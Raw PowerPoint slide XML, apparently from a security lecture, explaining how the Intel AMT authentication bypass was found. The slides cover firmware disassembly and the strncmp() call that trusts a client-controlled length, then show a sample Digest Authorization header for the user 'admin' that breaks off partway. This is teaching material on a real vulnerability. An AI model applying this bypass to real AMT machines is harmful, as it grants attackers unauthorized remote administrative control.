            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1383255" y="1084996"/>
            <a:ext cx="9425489" cy="5773004"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7529B1CD-BE84-4930-B81B-A32933D340AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="52300"/>
            <a:ext cx="10515600" cy="874128"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. . . then decompress it . . .</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA44C0C8-6DA7-4F02-9E1D-33B40CF6AD56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1034716" y="3796496"/>
            <a:ext cx="10094495" cy="106426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35563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29B1CD-BE84-4930-B81B-A32933D340AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="52300"/>
            <a:ext cx="10515600" cy="874128"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. . . then disassemble the binary!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BDE0C96-FD9A-479B-BC53-E8FCA9022DFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143677" y="874687"/>
            <a:ext cx="9904645" cy="5931013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2038720812"/>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EFE7B1-A269-41DD-B6EF-1486C17DDED7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="39600"/>
            <a:ext cx="10515600" cy="1179600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But how do we figure out where the authentication code is implemented?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B22B7638-6B39-4E8E-8197-76212843B351}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838200" y="1135759"/>
            <a:ext cx="10515600" cy="5851087"/>
            <a:chOff x="838200" y="1135759"/>
            <a:chExt cx="10515600" cy="5851087"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Title 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E42C73B5-F42C-41F0-8526-24487DFD1CA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="838200" y="5807246"/>
              <a:ext cx="10515600" cy="1179600"/>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Grep for static protocol strings like “</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
                <a:t>cnonce</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>,” then see which code references those strings!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0267328E-BEF4-46AA-B904-6569B512BBBE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1403684" y="1135759"/>
              <a:ext cx="9384632" cy="4720288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC0B2D89-BC78-412A-B4B2-16569C604B9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="19771"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="95250" y="3429000"/>
            <a:ext cx="12001500" cy="678267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="464871907"/>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19D9B6-2911-49DC-9DD5-49837014FCCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="5894"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3232498" y="180476"/>
            <a:ext cx="8835178" cy="3623790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8818DCD2-D02E-4A8B-BFC8-381DA3A4D964}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="4145"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3232499" y="4125553"/>
            <a:ext cx="8835178" cy="2527909"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F6F69CA-EFE0-4940-A93E-39FD1A66388F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="12027"/>
            <a:ext cx="3272590" cy="2117557"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>After some investigation, we find the AMT code that compares the client-submitted authentication value to one computed by AMT.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E076617-F300-4412-86AA-41C2DE5AB717}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1973172"/>
            <a:ext cx="3272590" cy="199954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sz="2000" dirty="0"/>
              <a:t>[Note: These instructions are for a 32-bit ARC RISC CPU—the machine being analyzed was made before Intel switched the ME to a 32-bit x86 core.]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6ADFB7E-0AFF-4777-A7D0-2BF38AF3E6DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4281964"/>
            <a:ext cx="3272590" cy="199954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sz="2000" dirty="0"/>
              <a:t>Converting the assembly into source code, we see that AMT is performing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strncmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> using a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>client-controlled value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> to determine the number of characters to compare!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5352AFA0-F004-43FE-8AD4-E3FCCE73F1C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6870031" y="5509822"/>
            <a:ext cx="4908885" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>strncmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> always says that strings are equal if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is 0!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5723287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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FCFA387-7B18-4B85-8286-88F4CE36FEAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9228223" y="1367311"/>
            <a:ext cx="2926218" cy="3834610"/>
            <a:chOff x="8959719" y="3047320"/>
            <a:chExt cx="2926218" cy="3834610"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3919E42C-9578-4C62-9394-D6307504B969}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="9351321" y="3047320"/>
              <a:ext cx="2265125" cy="2879265"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9A8E483-133F-4975-9344-329D42AC3E18}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8959719" y="5823263"/>
              <a:ext cx="2926218" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>AMT-enabled</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63E105D6-1C85-43F6-B54E-DB9D9BC4818A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8988959" y="6235599"/>
              <a:ext cx="2776661" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F56D3D7B-E059-4250-979F-32D5FC7AD569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="73399" y="1511695"/>
            <a:ext cx="2926218" cy="3099108"/>
            <a:chOff x="217778" y="1511695"/>
            <a:chExt cx="2926218" cy="3099108"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1026" name="Picture 2" descr="Image result for laptop icon">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2443C52-2C64-432D-B1F3-80273CD91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78" y="1511695"/>
              <a:ext cx="2668501" cy="20857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E340A5-D475-4696-ABB7-EACBEDEF0FE8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="217778" y="3552136"/>
              <a:ext cx="2926218" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Admin</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6387F1DC-7B60-4DE4-9FAA-63DE8C4E0C70}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="283114" y="3964472"/>
              <a:ext cx="2776661" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>machine</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B606025-5D99-4CCE-87EE-A5A523392617}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3010196" y="917961"/>
            <a:ext cx="6427441" cy="1111239"/>
            <a:chOff x="3010196" y="2722708"/>
            <a:chExt cx="6427441" cy="1111239"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Straight Arrow Connector 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE00629D-38E8-4791-9AEB-0E1CE2C3F689}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3010196" y="3833947"/>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4978C2-8E5F-4CA2-9C42-507CFE339581}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3091009" y="2722708"/>
              <a:ext cx="4641812" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>HTTP GET /index.htm </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="TextBox 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1A1E024-7AF8-436C-A498-CFA96F534FB8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3596336" y="3182030"/>
              <a:ext cx="5374025" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Authorization: [logon info]</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94EC855F-607D-409D-A361-87D81C96972F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2734916" y="2039075"/>
            <a:ext cx="8345906" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Authorization: Digest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>   username="admin",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>   realm="Digest:C80900000000000000",      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>   nonce="JOKoAAdFAAApQD4w/l+88v4fscE6y2Ke",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>="/index.htm",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
